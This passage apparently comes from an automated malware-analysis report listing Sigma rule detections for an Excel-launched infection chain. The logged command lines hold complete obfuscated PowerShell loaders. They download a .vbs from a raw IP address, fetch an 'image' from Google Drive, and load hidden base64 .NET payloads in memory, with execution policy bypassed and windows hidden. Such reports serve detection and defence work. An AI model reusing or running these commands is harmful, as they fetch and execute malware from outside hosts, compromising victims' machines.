CAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", CommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICA
          Sigma detected: Suspicious Microsoft Office Child Process
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\System32\mshta.exe -Embedding, CommandLine: C:\Windows\System32\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3268, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\System32\mshta.exe -Embedding, ProcessId: 3572, ProcessName: mshta.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT, ProcessId: 3764, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , ProcessId: 3956, ProcessName: wscript.exe
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0JysnLkluZGV4T2YnKycoanZNZW5kRmxhZyk7anZNc3RhcnRJbmRleCAtZ2UgMCAtYW5kIGp2TWVuZEluZGV4IC1ndCBqdk1zdGFydEluZGV4O2p2TXN0YXJ0SW5kZXggKz0ganZNc3RhcnRGbGFnLkxlbmd0aDtqdk1iYXNlNjRMZW5ndGggPSBqdk1lbmRJJysnbmRleCAtIGp2TXN0YXJ0SW5kZScrJ3g7anZNYmFzZTY0Q29tbWFuZCA9IGp2TWltYWdlVGV4dC5TdWJzdHJpbmcoanZNc3RhcnRJbmRleCwganZNYmFzZTY0TGVuZ3RoKTtqdk0nKydiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChqdk1iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCcrJykgbnJFIEZvckVhJysnY2gtT2JqZWN0IHsganZNXyB9KVstMS4uLShqdk1iYXNlNjRDb21tYW5kLkxlbmd0aCldO2p2TWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoanZNYmFzZTY0UmV2ZXJzZWQpO2p2TWxvYWRlZEFzc2VtYmx5ICcrJz0gW1N5Jysnc3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChqdk1jb21tYW5kQnl0ZXMpO2p2TXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXScrJy5HZXRNZXRob2QnKycodUNiVkFJdUNiKTtqdk12YWlNZXRob2QuSW52b2tlKGp2TW51bGwsIEAodUNidHh0LicrJ0dST0wnKydMLzY2LzE1MS44NzEuNjQuODkxLycrJy86cHR0aHVDJysnYiwgdUNiZGVzYXRpdmFkb3VDYiwgdUNiZGVzYScrJ3RpdmFkb3VDYiwgdUNiZGVzYXRpdmFkb3VDYicrJywgdUNiYXNwbicrJ2UnKyd0X3JlZ2Jyb3dzZXJzdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLCB1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYXRpdmFkb3VDYix1Q2JkZXNhdGl2YWRvdUNiLHVDYmRlc2F0aXZhZG91Q2IsdUNiZGVzYScrJ3RpdmFkb3VDYix1Q2IxdUNiLHVDYmRlc2F0aXZhZG91Q2IpKTsnKS5SZXBsQWNlKCdqdk0nLCckJykuUmVwbEFjZSgndUNiJyxbc1RyaW5HXVtjaGFSXTM5KS5SZXBsQWNlKChbY2hhUl0xMTArW2NoYVJdMTE0K1tjaGFSXTY5KSxbc1RyaW5HXVtjaGFSXTEyNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRTSEVMbGlkWzFdKyRzaEVsbElkWzEzXSsnWCcpICgoJ2p2TWltYWdlVXJsID0gdUNiaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dXIgdUNiO2p2TXdlYkNsaWVudCA9IE5ldy1PYmplYycrJ3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7anZNaW1hZ2VCJysneXRlJysncyA9IGp2TXdlYkNsaWVudC5Eb3dubG9hZERhJysndGEoanZNaW1hZ2VVcmwpO2p2TWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKGp2TWltYWdlQnl0ZXMpO2p2TXN0YXJ0RmxhZyA9IHVDYjw8QkFTRTY0X1NUQVJUPj51Q2I7anZNZW5kJysnRmxhZyA9IHVDYjw8QkFTRTY0X0VORD4+dUNiO2p2TXN0YXJ0SW5kZXggPSBqdk1pbWFnZVRleHQuSW5kZXhPZihqdk1zdGFydEZsYWcpO2p2TWVuZEluZGV4ID0ganZNaW1hZ2VUZXh0Jysn
          Sigma detected: Dynamic .NET Compilation Via Csc.EXE
          Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\brij5btb\brij5btb.cmdline", ProcessId: 3856, ProcessName: csc.exe
          Sigma detected: Excel Network Connections
          Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 172.67.162.95, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3268, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49163
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 3656, TargetFilename: C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs
          Sigma detected: Suspicious Office Outbound Connections
          Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49163, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3268, Protocol: tcp, SourceIp: 172.67.162.95, SourceIsIpv6: false, SourcePort: 443
          Sigma detected: Usage Of Web Request Commands And Cmdlets
          Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowsersuCb, uCbdesativadouCb, uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesativadouCb,uCbdesa'+'tivadouCb,uCb1uCb,uCbdesativadouCb));').ReplAce('jvM','$').ReplAce('uCb',[sTrinG][chaR]39).ReplAce(([chaR]110+[chaR]114+[chaR]69),[sTrinG][chaR]124))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $SHELlid[1]+$shEllId[13]+'X') (('jvMimageUrl = uCbhttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur uCb;jvMwebClient = New-Objec'+'t System.Net.WebClient;jvMimageB'+'yte'+'s = jvMwebClient.DownloadDa'+'ta(jvMimageUrl);jvMimageText = [System.Text.Encoding]::UTF8.GetString(jvMimageBytes);jvMstartFlag = uCb<<BASE64_START>>uCb;jvMend'+'Flag = uCb<<BASE64_END>>uCb;jvMstartIndex = jvMimageText.IndexOf(jvMstartFlag);jvMendIndex = jvMimageText'+'.IndexOf'+'(jvMendFlag);jvMstartIndex -ge 0 -and jvMendIndex -gt jvMstartIndex;jvMstartIndex += jvMstartFlag.Length;jvMbase64Length = jvMendI'+'ndex - jvMstartInde'+'x;jvMbase64Command = jvMimageText.Substring(jvMstartIndex, jvMbase64Length);jvM'+'base64Reversed = -join (jvMbase64Command.ToCharArray('+') nrE ForEa'+'ch-Object { jvM_ })[-1..-(jvMbase64Command.Length)];jvMcommandBytes = [System.Convert]::FromBase64String(jvMbase64Reversed);jvMloadedAssembly '+'= [Sy'+'stem.Reflection.Assembly]::Load(jvMcommandBytes);jvMvaiMethod = [dnlib.IO.Home]'+'.GetMethod'+'(uCbVAIuCb);jvMvaiMethod.Invoke(jvMnull, @(uCbtxt.'+'GROL'+'L/66/151.871.64.891/'+'/:ptthuC'+'b, uCbdesativadouCb, uCbdesa'+'tivadouCb, uCbdesativadouCb'+', uCbaspn'+'e'+'t_regbrowse
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\sYSTEM32\windOWSPowerShell\V1.0\POWeRSHell.eXE" "poweRSheLl.EXe -eX byPASS -noP -W 1 -c dEVicECREdeNtiaLDePlOymenT ; Iex($(IEX('[sYstEm.tExT.enCOding]'+[char]0X3a+[char]0x3A+'UtF8.GETStRIng([sySTEM.convERt]'+[CHAR]58+[CHar]58+'fRoMbase64STriNg('+[Char]0x22+'JFZENmI1TUtGICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTW9uLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtHRENPeUFFdkgsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd3Esc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZkhuSk9PQWdhTCx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmNMV0JuWCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiS2cpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ3TnZtcExmRlp2IiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cU9kWVBRUCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkVkQ2YjVNS0Y6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguNDYuMTc4LjE1MS82Ni9zZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnb29kZm9ybWV3aXRoLnRJRiIsIiRFTnY6QVBQREFUQVxzZWVtZXRoZWJlc3R0aGluZ3N3aXRoZ3JlYXRuZWVkc3dpdGhnby52YnMiLDAsMCk7c3RBcnQtU2xFZXAoMyk7c1RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOdjpBUFBEQVRBXHNlZW1ldGhlYmVzdHRoaW5nc3dpdGhncmVhdG5lZWRzd2l0aGdvLnZicyI='+[cHAr]34+'))')))", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 3656, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemethebestthingswithgreatneedswithgo.vbs" , ProcessId: 3956, 